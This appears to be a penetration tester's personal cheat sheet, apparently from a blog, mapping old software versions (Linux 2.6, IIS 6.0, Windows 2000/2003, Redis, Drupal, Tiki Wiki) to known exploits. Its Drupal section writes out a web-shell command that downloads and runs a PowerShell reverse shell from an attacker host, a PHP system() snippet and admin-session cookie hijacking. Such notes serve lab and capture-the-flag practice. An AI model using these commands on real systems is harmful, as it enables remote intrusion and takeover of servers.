Linux 2.6.x -- > Priv Esc For Cent OS - 9595 dirty cow
IIS 6.0 --> (229) 10791.py- File Extension Bypass
Windows Server 2000 --> SMB VULN MS08-067
Windows Server 2003 -- NT Authority Service to System
Redis 4.x/5.x Unauth --> Packet Storm
other Redis Exploitation Techniques:
AGS BLOG Exploiting Redis 6379 Pen Testing
VNC 4 --> Real VNC 4 - Auth Bypass
Drupal Exploit --> Exploit-DB ; also find modified in /root/Downloads/exploits/drupal < 7.58 < 8.3.9 < 8.4.6 < 8.5.1 1) Run the exploit 2) go to website.com/bhanu.php?cmd=whoami 2.1) http://wensite.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile - //Get Reverse Shell 3) a new session.json file is created
4) go to cookie manager plus --> add a new cookie from the earlier details and save it. go to website.com and see you are logged in as admin
5) OPTIONAL -- http://10.10.10.9/user#overlay=admin/modules --> Turn on PHGP filter --> save configuration
6) go to http://10.10.10.9/user#overlay=node/add/article --> add php scipt for command execution --> <?php system(whoami); ?> Change the text format -- PHP code --> Save
Tiki Wiki 15.1 --> Exploit-DB Unrestricted File upload -Doesnt work Github
ms-08-67 --> Python Exploit
Eternal Blue MS17-010 --> Without Metasploit
Privilege Escalation using SeImpersonatePrivilege Enabled in windows exploitation tutorial.
This should be performed after you get a user shell, where you can run commands. type the following commands in CMD.
type "systeminfo" get the system complete information, check for available hotfixes.
For SeImpersonatePrivilege Enabled Juicy Potato can be used to exploit.
Comments
Post a Comment